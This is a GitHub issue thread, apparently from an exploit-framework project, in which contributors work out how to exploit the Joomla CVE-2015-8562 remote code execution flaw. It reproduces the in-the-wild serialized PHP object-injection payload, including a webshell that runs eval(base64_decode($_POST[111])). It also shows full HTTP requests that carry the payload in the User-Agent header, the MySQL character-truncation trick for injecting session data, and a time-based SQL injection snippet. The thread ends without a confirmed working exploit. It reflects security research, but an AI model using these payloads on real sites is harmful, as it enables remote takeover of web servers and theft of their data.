New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Request] Critical 0day RCE in Joomla (CVE-2015-8562) #6347

Closed
madmike33 opened this Issue Dec 14, 2015 · 104 comments

Comments

Projects
None yet
@madmike33

@jvoisin r u interested mate

This is a serious vulnerability that can be easily exploited and is already in the wild. http://hubs.ly/H01B2K20

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Dec 14, 2015

Contributor

Thank you, @madmike33. Looks much better, lol.

Contributor

wvu-r7 commented Dec 14, 2015

Thank you, @madmike33. Looks much better, lol.

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Dec 14, 2015

Agree 😁

Agree 😁

@madmike33 madmike33 closed this Dec 14, 2015

@madmike33 madmike33 reopened this Dec 14, 2015

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Dec 14, 2015

@wvu-r7 how about some labels

@wvu-r7 how about some labels

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 14, 2015

Contributor

Changes from this version:
joomla/joomla-cms@3.4.5...3.4.6

Contributor

FireFart commented Dec 14, 2015

Changes from this version:
joomla/joomla-cms@3.4.5...3.4.6

@FireFart

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

This comment has been minimized.

Show comment
Hide comment
Contributor

wvu-r7 commented Dec 14, 2015

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Dec 14, 2015

@FireFart tu,interesting its alla bout uploading the payload in the tokens,if iam not wrong

@FireFart tu,interesting its alla bout uploading the payload in the tokens,if iam not wrong

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 14, 2015

Contributor

This seems to be the raw payload:

}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:\x22eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86

cc @brandonprry

Contributor

FireFart commented Dec 14, 2015

This seems to be the raw payload:

}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:\x22eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86

cc @brandonprry

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Dec 14, 2015

Contributor

I am very close, give me an hour or so.

Contributor

brandonprry commented Dec 14, 2015

I am very close, give me an hour or so.

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Dec 14, 2015

@brandonprry waiting to be the firsr one to test it :)

@brandonprry waiting to be the firsr one to test it :)

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 14, 2015

Contributor

@brandonprry great! i need to get some sleep will check it tomorrow morning in about 6 hours

Contributor

FireFart commented Dec 14, 2015

@brandonprry great! i need to get some sleep will check it tomorrow morning in about 6 hours

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Dec 15, 2015

Contributor

It takes two requests;

One to put the tainted data in the db.
One to pull the tainted data out and deserialize.

(I think)

I have not gotten full RCE yet, but sending this request a few times will yield a 500 error.

GET / HTTP/1.1
Host: 192.168.0.20
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:36:"sleep(5);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}�
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: cdfc0c865832b045d476c0eaba383ddc=97ot8pr8bcvicvtt9vvi8mdk04;
Connection: keep-alive
Content-Length: 0

The error in the log is:

[Mon Dec 14 18:06:35.518826 2015] [:error] [pid 11184] [client 192.168.0.10:51041] PHP Warning: session_start(): Failed to decode session object. Session has been destroyed in /var/www/html/libraries/joomla/session/session.php on line 665

Still working on getting the payload to work correctly. It is obvious the intent, but something seems to be missing...

Contributor

brandonprry commented Dec 15, 2015

It takes two requests;

One to put the tainted data in the db.
One to pull the tainted data out and deserialize.

(I think)

I have not gotten full RCE yet, but sending this request a few times will yield a 500 error.

GET / HTTP/1.1
Host: 192.168.0.20
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:36:"sleep(5);JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}�
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: cdfc0c865832b045d476c0eaba383ddc=97ot8pr8bcvicvtt9vvi8mdk04;
Connection: keep-alive
Content-Length: 0

The error in the log is:

[Mon Dec 14 18:06:35.518826 2015] [:error] [pid 11184] [client 192.168.0.10:51041] PHP Warning: session_start(): Failed to decode session object. Session has been destroyed in /var/www/html/libraries/joomla/session/session.php on line 665

Still working on getting the payload to work correctly. It is obvious the intent, but something seems to be missing...

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Dec 15, 2015

Contributor

Ah, extra info, the data you are manipulating is in the *_session table in the 'data' column.

Also, that payload should sleep for 5 seconds on the second request if it worked.

Contributor

brandonprry commented Dec 15, 2015

Ah, extra info, the data you are manipulating is in the *_session table in the 'data' column.

Also, that payload should sleep for 5 seconds on the second request if it worked.

@kendyhikaru

This comment has been minimized.

Show comment
Hide comment

@brandonprry wait your info.

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Dec 15, 2015

Contributor

The 500 error I am getting seems completely unrelated and is a Duplicate entry exception.

exception 'RuntimeException' with message 'Duplicate entry '' for key 'PRIMARY' SQL=INSERT INTO `hjesv_session`
(`session_id`, `client_id`, `time`) VALUES 
('', 0, '1450143682')' in /var/www/html/libraries/joomla/database/driver/mysqli.php:610
Stack trace:
#0 /var/www/html/libraries/cms/application/cms.php(208): JDatabaseDriverMysqli->execute()
#1 /var/www/html/libraries/cms/application/cms.php(767): JApplicationCms->checkSession()
#2 /var/www/html/libraries/cms/application/cms.php(131): JApplicationCms->loadSession()
#3 /var/www/html/libraries/cms/application/site.php(63): JApplicationCms->__construct(NULL, NULL, NULL)
#4 /var/www/html/libraries/cms/application/cms.php(401): JApplicationSite->__construct()
#5 /var/www/html/libraries/joomla/factory.php(125): JApplicationCms::getInstance('site')
#6 /var/www/html/index.php(42): JFactory::getApplication('site')
#7 {main}Error displaying the error page:

Still working. Not sure if they are related or not, but one (the error.log session error) always happens with the other (SQL exception for duplicate value).

I think they are related in that the session is not being deserialized correctly coming out of the DB so Joomla decides to write the cookie again, but it already exists.

Contributor

brandonprry commented Dec 15, 2015

The 500 error I am getting seems completely unrelated and is a Duplicate entry exception.

exception 'RuntimeException' with message 'Duplicate entry '' for key 'PRIMARY' SQL=INSERT INTO `hjesv_session`
(`session_id`, `client_id`, `time`) VALUES 
('', 0, '1450143682')' in /var/www/html/libraries/joomla/database/driver/mysqli.php:610
Stack trace:
#0 /var/www/html/libraries/cms/application/cms.php(208): JDatabaseDriverMysqli->execute()
#1 /var/www/html/libraries/cms/application/cms.php(767): JApplicationCms->checkSession()
#2 /var/www/html/libraries/cms/application/cms.php(131): JApplicationCms->loadSession()
#3 /var/www/html/libraries/cms/application/site.php(63): JApplicationCms->__construct(NULL, NULL, NULL)
#4 /var/www/html/libraries/cms/application/cms.php(401): JApplicationSite->__construct()
#5 /var/www/html/libraries/joomla/factory.php(125): JApplicationCms::getInstance('site')
#6 /var/www/html/index.php(42): JFactory::getApplication('site')
#7 {main}Error displaying the error page:

Still working. Not sure if they are related or not, but one (the error.log session error) always happens with the other (SQL exception for duplicate value).

I think they are related in that the session is not being deserialized correctly coming out of the DB so Joomla decides to write the cookie again, but it already exists.

@brandonprry

This comment has been minimized.

Show comment
Hide comment
@brandonprry

brandonprry Dec 15, 2015

Contributor

They are not related.

EDIT: I might have spoken too soon.

Contributor

brandonprry commented Dec 15, 2015

They are not related.

EDIT: I might have spoken too soon.

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

@brandonprry so exactly how far I got :(

Contributor

FireFart commented Dec 15, 2015

@brandonprry so exactly how far I got :(

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Dec 15, 2015

Contributor

I poked at this on my own... and got equally as far, lol.

Contributor

wvu-r7 commented Dec 15, 2015

I poked at this on my own... and got equally as far, lol.

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Dec 15, 2015

Contributor

Think I got it.

Contributor

wvu-r7 commented Dec 15, 2015

Think I got it.

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

so it seems the exploit works like some session injection. It puts in a new session identifier __test (instead of the normal __default) with serialized data. I think we only need to find a call which unserializes the whole session object in a second request. https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/session/session.php#L479

Contributor

FireFart commented Dec 15, 2015

so it seems the exploit works like some session injection. It puts in a new session identifier __test (instead of the normal __default) with serialized data. I think we only need to find a call which unserializes the whole session object in a second request. https://github.com/joomla/joomla-cms/blob/3.4.5/libraries/joomla/session/session.php#L479

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Dec 15, 2015

Contributor

Gonna put together a PoC... hope it's not a fluke!

Contributor

wvu-r7 commented Dec 15, 2015

Gonna put together a PoC... hope it's not a fluke!

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

@wvu-r7 👯 so send it over for testing :D

Contributor

FireFart commented Dec 15, 2015

@wvu-r7 👯 so send it over for testing :D

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Dec 15, 2015

Contributor

Doh! Looks like a false alarm. Perhaps using a time-based attack wasn't ideal, since I happened to get the expected delay repeatedly. :(

Contributor

wvu-r7 commented Dec 15, 2015

Doh! Looks like a false alarm. Perhaps using a time-based attack wasn't ideal, since I happened to get the expected delay repeatedly. :(

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Dec 15, 2015

So anything new so far guys,the thing is in the payload according to sucuri they modified the payload, @wchen-r7 any idea from ur side too?

So anything new so far guys,the thing is in the payload according to sucuri they modified the payload, @wchen-r7 any idea from ur side too?

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Dec 15, 2015

Contributor

Yeah, we're missing some critical details here, so there's a lot of code reading and experimentation going on. Wonder how close @brandonprry is now.

Contributor

wvu-r7 commented Dec 15, 2015

Yeah, we're missing some critical details here, so there's a lot of code reading and experimentation going on. Wonder how close @brandonprry is now.

@icehteam

This comment has been minimized.

Show comment
Hide comment
@icehteam

icehteam Dec 15, 2015

The code gets inserted in the database into sessions, i'm sure there must be a pattern to call the serialized data to inject with post data of 111.

The code gets inserted in the database into sessions, i'm sure there must be a pattern to call the serialized data to inject with post data of 111.

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

jeah but we haven't found it so far

Contributor

FireFart commented Dec 15, 2015

jeah but we haven't found it so far

@evi1m0

This comment has been minimized.

Show comment
Hide comment
@evi1m0

evi1m0 Dec 15, 2015

We need to find it. :<

evi1m0 commented Dec 15, 2015

We need to find it. :<

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Dec 15, 2015

Sth Weird i set my User-Agent as
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}
first time it worked, after than when i retried i just got 500 error, i wonder if it has to do sth with overwriting sessions :/ @brandonprry @FireFart @wvu-r7 btw i modified it a little have a look at it

Sth Weird i set my User-Agent as
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}
first time it worked, after than when i retried i just got 500 error, i wonder if it has to do sth with overwriting sessions :/ @brandonprry @FireFart @wvu-r7 btw i modified it a little have a look at it

@icehteam

This comment has been minimized.

Show comment
Hide comment
@icehteam

icehteam Dec 15, 2015

The code gets inserted in the database into sessions, i'm sure there must be a pattern to call the serialized data to inject with post data of 111.

The code gets inserted in the database into sessions, i'm sure there must be a pattern to call the serialized data to inject with post data of 111.

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Dec 15, 2015

@icehteam give it a try on ur side with the payload i have mentioned up using base64 and let me know ur result

@icehteam give it a try on ur side with the payload i have mentioned up using base64 and let me know ur result

@mmetince

This comment has been minimized.

Show comment
Hide comment
@mmetince

mmetince Dec 15, 2015

Contributor

@brandonprry You User-Agent has to be start or end with double quote in order to do string escaping at serialized string. Also you payload has to end with some special characters that latin-1 does NOT support like ð .

For example :
User-Agent : TEST

Serialized string is :

 __default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169533;s:18:"session.timer.last";i:1450169533;s:17:"session.timer.now";i:1450169533;s:22:"session.client.browser";s:4:"TEST";s:8:"registry";O:24:"Joomla\Registry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:4:"user";O:5:"JUser":26:{s:9:"\0\0\0isRoot";b:0;s:2:"id";i:0;s:4:"name";N;s:8:"username";N;s:5:"email";N;s:8:"password";N;s:14:"password_clear";s:0:"";s:5:"block";N;s:9:"sendEmail";i:0;s:12:"registerDate";N;s:13:"lastvisitDate";N;s:10:"activation";N;s:6:"params";N;s:6:"groups";a:1:{i:0;s:1:"9";}s:5:"guest";i:1;s:13:"lastResetTime";N;s:10:"resetCount";N;s:12:"requireReset";N;s:10:"\0\0\0_params";O:24:"Joomla\Registry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:14:"\0\0\0_authGroups";a:2:{i:0;i:1;i:1;i:9;}s:14:"\0\0\0_authLevels";a:3:{i:0;i:1;i:1;i:1;i:2;i:5;}s:15:"\0\0\0_authActions";N;s:12:"\0\0\0_errorMsg";N;s:13:"\0\0\0userHelper";O:18:"JUserWrapperHelper":0:{}s:10:"\0\0\0_errors";a:0:{}s:3:"aid";i:0;}s:16:"com_mailto.links";a:4:{s:40:"864263691cf020260fd769f9e91b5152c4a0e278";O:8:"stdClass":2:{s:4:"link";s:54:"http://127.0.0.1:8181/index.php/3-welcome-to-your-blog";s:6:"expiry";i:1450169533;}s:40:"a7425dbaaa274c9c71da73ebdfc40ed0e1941365";O:8:"stdClass":2:{s:4:"link";s:54:"http://127.0.0.1:8181/index.php/4-about-your-home-page";s:6:"expiry";i:1450169533;}s:40:"50717150dd908262db5e49b4334dcc7f2d3bd0dd";O:8:"stdClass":2:{s:4:"link";s:47:"http://127.0.0.1:8181/index.php/6-your-template";s:6:"expiry";i:1450169533;}s:40:"78e8cf066aacebaecd359c665129e4281e269205";O:8:"stdClass":2:{s:4:"link";s:46:"http://127.0.0.1:8181/index.php/5-your-modules";s:6:"expiry";i:1450169533;}}}

Please look at where TEST is located.

User-Agent is : TESTð (ending with none valid character for latin-1)
Serialized string is:

__default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169650;s:18:"session.timer.last";i:1450169650;s:17:"session.timer.now";i:1450169650;s:22:"session.client.browser";s:5:"TEST

As you can see, rest of the serialized string is omitted! because of MySQL behavior ( it remind one of the Wordpress stored XSS. ) That is the our entry point. Also as I said before our payload need to end/start with double quote in order to do another trick which is escaping!

User Agent is : TEST"}ð

Serialized string is :

__default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169799;s:18:"session.timer.last";i:1450169799;s:17:"session.timer.now";i:1450169799;s:22:"session.client.browser";s:6:"TEST"}

We managed to define __default array with valid syntax. Then we are free to define our serialized object that carry payload through MySQLDriver class.

Contributor

mmetince commented Dec 15, 2015

@brandonprry You User-Agent has to be start or end with double quote in order to do string escaping at serialized string. Also you payload has to end with some special characters that latin-1 does NOT support like ð .

For example :
User-Agent : TEST

Serialized string is :

 __default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169533;s:18:"session.timer.last";i:1450169533;s:17:"session.timer.now";i:1450169533;s:22:"session.client.browser";s:4:"TEST";s:8:"registry";O:24:"Joomla\Registry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:4:"user";O:5:"JUser":26:{s:9:"\0\0\0isRoot";b:0;s:2:"id";i:0;s:4:"name";N;s:8:"username";N;s:5:"email";N;s:8:"password";N;s:14:"password_clear";s:0:"";s:5:"block";N;s:9:"sendEmail";i:0;s:12:"registerDate";N;s:13:"lastvisitDate";N;s:10:"activation";N;s:6:"params";N;s:6:"groups";a:1:{i:0;s:1:"9";}s:5:"guest";i:1;s:13:"lastResetTime";N;s:10:"resetCount";N;s:12:"requireReset";N;s:10:"\0\0\0_params";O:24:"Joomla\Registry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:14:"\0\0\0_authGroups";a:2:{i:0;i:1;i:1;i:9;}s:14:"\0\0\0_authLevels";a:3:{i:0;i:1;i:1;i:1;i:2;i:5;}s:15:"\0\0\0_authActions";N;s:12:"\0\0\0_errorMsg";N;s:13:"\0\0\0userHelper";O:18:"JUserWrapperHelper":0:{}s:10:"\0\0\0_errors";a:0:{}s:3:"aid";i:0;}s:16:"com_mailto.links";a:4:{s:40:"864263691cf020260fd769f9e91b5152c4a0e278";O:8:"stdClass":2:{s:4:"link";s:54:"http://127.0.0.1:8181/index.php/3-welcome-to-your-blog";s:6:"expiry";i:1450169533;}s:40:"a7425dbaaa274c9c71da73ebdfc40ed0e1941365";O:8:"stdClass":2:{s:4:"link";s:54:"http://127.0.0.1:8181/index.php/4-about-your-home-page";s:6:"expiry";i:1450169533;}s:40:"50717150dd908262db5e49b4334dcc7f2d3bd0dd";O:8:"stdClass":2:{s:4:"link";s:47:"http://127.0.0.1:8181/index.php/6-your-template";s:6:"expiry";i:1450169533;}s:40:"78e8cf066aacebaecd359c665129e4281e269205";O:8:"stdClass":2:{s:4:"link";s:46:"http://127.0.0.1:8181/index.php/5-your-modules";s:6:"expiry";i:1450169533;}}}

Please look at where TEST is located.

User-Agent is : TESTð (ending with none valid character for latin-1)
Serialized string is:

__default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169650;s:18:"session.timer.last";i:1450169650;s:17:"session.timer.now";i:1450169650;s:22:"session.client.browser";s:5:"TEST

As you can see, rest of the serialized string is omitted! because of MySQL behavior ( it remind one of the Wordpress stored XSS. ) That is the our entry point. Also as I said before our payload need to end/start with double quote in order to do another trick which is escaping!

User Agent is : TEST"}ð

Serialized string is :

__default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169799;s:18:"session.timer.last";i:1450169799;s:17:"session.timer.now";i:1450169799;s:22:"session.client.browser";s:6:"TEST"}

We managed to define __default array with valid syntax. Then we are free to define our serialized object that carry payload through MySQLDriver class.

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Dec 15, 2015

@mmetince Guzel arkadash :) i think he has a point :)

@mmetince Guzel arkadash :) i think he has a point :)

@evi1m0

This comment has been minimized.

Show comment
Hide comment
@icehteam

This comment has been minimized.

Show comment
Hide comment
@icehteam

icehteam Dec 15, 2015

@evi1m0 congrats that you have found.

@evi1m0 congrats that you have found.

@shargon

This comment has been minimized.

Show comment
Hide comment
@shargon

shargon Dec 15, 2015

this code produce insert in session table... but the code dont execute ...

GET http://xxxxxxxxxxxx/index.php?lang=es HTTP/1.1
Host: xxxxxx
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}
Accept-Language: es-ES,es;q=0.8
Cookie: _ga=GA1.2.643008714.1450174140; 4129bbefb84766bd976b50022b1d5584=dsviufiujk25e1eoug2fuktln6; 5a63016b8228e8842a075e3be3ccdab8=es-ES

in table got this ... (field data)

'__default|a:7:{s:15:"session.counter";i:2;s:19:"session.timer.start";i:1450185484;s:18:"session.timer.last";i:1450185484;s:17:"session.timer.now";i:1450185497;s:22:"session.client.browser";s:396:"}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}";s:8:"registry";O:9:"JRegistry":1:{s:7:"

i still working ...

shargon commented Dec 15, 2015

this code produce insert in session table... but the code dont execute ...

GET http://xxxxxxxxxxxx/index.php?lang=es HTTP/1.1
Host: xxxxxx
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}
Accept-Language: es-ES,es;q=0.8
Cookie: _ga=GA1.2.643008714.1450174140; 4129bbefb84766bd976b50022b1d5584=dsviufiujk25e1eoug2fuktln6; 5a63016b8228e8842a075e3be3ccdab8=es-ES

in table got this ... (field data)

'__default|a:7:{s:15:"session.counter";i:2;s:19:"session.timer.start";i:1450185484;s:18:"session.timer.last";i:1450185484;s:17:"session.timer.now";i:1450185497;s:22:"session.client.browser";s:396:"}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"connection";b:1;}";s:8:"registry";O:9:"JRegistry":1:{s:7:"

i still working ...

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Dec 15, 2015

@shargon tu for the clarification i wanted to see if its only me getting untill here ;) i know where to look now :)

@shargon tu for the clarification i wanted to see if its only me getting untill here ;) i know where to look now :)

@allyshka

This comment has been minimized.

Show comment
Hide comment
@allyshka

allyshka Dec 15, 2015

@shargon Problem in size of serialized data. In your example: s:396:"}__test|O:21:"JDatabaseDriverMysqli

If you use payload like this: ";}__ wrong size of string variable call error during unserialize process.
If size is correct, then exploit is successfull.

Question is - how to get correct size.

@shargon Problem in size of serialized data. In your example: s:396:"}__test|O:21:"JDatabaseDriverMysqli

If you use payload like this: ";}__ wrong size of string variable call error during unserialize process.
If size is correct, then exploit is successfull.

Question is - how to get correct size.

@shargon

This comment has been minimized.

Show comment
Hide comment
@shargon

shargon Dec 15, 2015

@allyshka i can insert inside the fist __default like this ...

UserAgent: TEST" CODE HERE }ð

and result in session table (data field) is:

'__default|a:7:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450187208;s:18:"session.timer.last";i:1450187208;s:17:"session.timer.now";i:1450187208;s:22:"session.client.browser";s:19:"TEST" CODE HERE }ð";s:8:"registry";O:9:"JRegistry":1:{s:7:"

but yes, size is 19 ...

shargon commented Dec 15, 2015

@allyshka i can insert inside the fist __default like this ...

UserAgent: TEST" CODE HERE }ð

and result in session table (data field) is:

'__default|a:7:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450187208;s:18:"session.timer.last";i:1450187208;s:17:"session.timer.now";i:1450187208;s:22:"session.client.browser";s:19:"TEST" CODE HERE }ð";s:8:"registry";O:9:"JRegistry":1:{s:7:"

but yes, size is 19 ...

@shargon

This comment has been minimized.

Show comment
Hide comment
@shargon

shargon Dec 15, 2015

i think the exploit is like this ... dummy";s:xxx:"EXPLOIT" }\0ð

shargon commented Dec 15, 2015

i think the exploit is like this ... dummy";s:xxx:"EXPLOIT" }\0ð

@cyadron

This comment has been minimized.

Show comment
Hide comment
@cyadron

cyadron Dec 15, 2015

Getting data in the DB is solved. But we must find a magic method to also get the data out (execute the object).

cyadron commented Dec 15, 2015

Getting data in the DB is solved. But we must find a magic method to also get the data out (execute the object).

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Dec 15, 2015

@cyadron sth like this ? AND (SELECT * FROM (SELECT(SLEEP(5)))TEST) AND (3432=3432

@cyadron sth like this ? AND (SELECT * FROM (SELECT(SLEEP(5)))TEST) AND (3432=3432

@shargon

This comment has been minimized.

Show comment
Hide comment
@shargon

shargon Dec 15, 2015

@madmike33 ... this is a sql ... it has nothing to do with the subject

shargon commented Dec 15, 2015

@madmike33 ... this is a sql ... it has nothing to do with the subject

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Dec 15, 2015

@shargon i know that it is SQL however how are u planning on calling it except with an sql query ? BTW this is just an example

@shargon i know that it is SQL however how are u planning on calling it except with an sql query ? BTW this is just an example

@shargon

This comment has been minimized.

Show comment
Hide comment
@shargon

shargon Dec 15, 2015

@madmike33

This exploits run like this

First, insert the payload in the session table ( in the correct way )

Then, the next call to the server, the session is deserialized, and execute the php payload

Sorry for my bad english

shargon commented Dec 15, 2015

@madmike33

This exploits run like this

First, insert the payload in the session table ( in the correct way )

Then, the next call to the server, the session is deserialized, and execute the php payload

Sorry for my bad english

@icehteam

This comment has been minimized.

Show comment
Hide comment
@icehteam

icehteam Dec 15, 2015

Anybody with good knowledge of OOP's can execute this , I'm still trying.. anyone using skype..??
